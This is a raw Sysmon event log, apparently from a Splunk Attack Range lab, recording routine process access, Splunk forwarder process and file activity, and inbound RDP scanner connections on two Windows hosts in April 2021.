14:54:57.686{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049647Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EB41-607E-D806-00000000BB01}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049646Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB41-607E-D806-00000000BB01}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049645Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.688{85C0FFC9-EB41-607E-D806-00000000BB01}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049644Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.639{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E91C551A8E669F910124EC610832B456,SHA256=FD794B5ECA7E5EB9477BF9496FBF32E17702358FC849D9EAD42225AE9AC18F71,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049643Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.246{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com49241-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049642Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.561{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0492A36D5924DD6C89D578E372F3C41,SHA256=ACF495DEE8EB7C08B9BB74869D564CD86671059315AA2B000D7C86FF47A80BEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049641Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.264{85C0FFC9-EB41-607E-D706-00000000BB01}40002552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049640Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB41-607E-D706-00000000BB01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049639Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049638Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049637Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049636Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049635Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049634Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049633Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049632Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049631Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049630Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EB41-607E-D706-00000000BB01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049629Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB41-607E-D706-00000000BB01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049628Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.155{85C0FFC9-EB41-607E-D706-00000000BB01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000064950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:58.736{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:58.595{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E1DF5FC15308CC54CD9D65638C37FD6,SHA256=8FA9C6062EED63971FEC94E77F30FCAF3D3239F2A6C1F5EEF7A5CD5780FEA37F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:58.424{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=573D980FD7148AD74E97D480FE12EA49,SHA256=F60F4EF320F25FF48050ADEADA46AF27E5665C26F736E679A01B1EDAAFA133F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049674Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.467{85C0FFC9-EB42-607E-D906-00000000BB01}35401776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000049673Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.422{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63107-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049672Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:55.381{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49999-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000049671Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB42-607E-D906-00000000BB01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049670Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049669Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049668Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:58.358{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049667Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 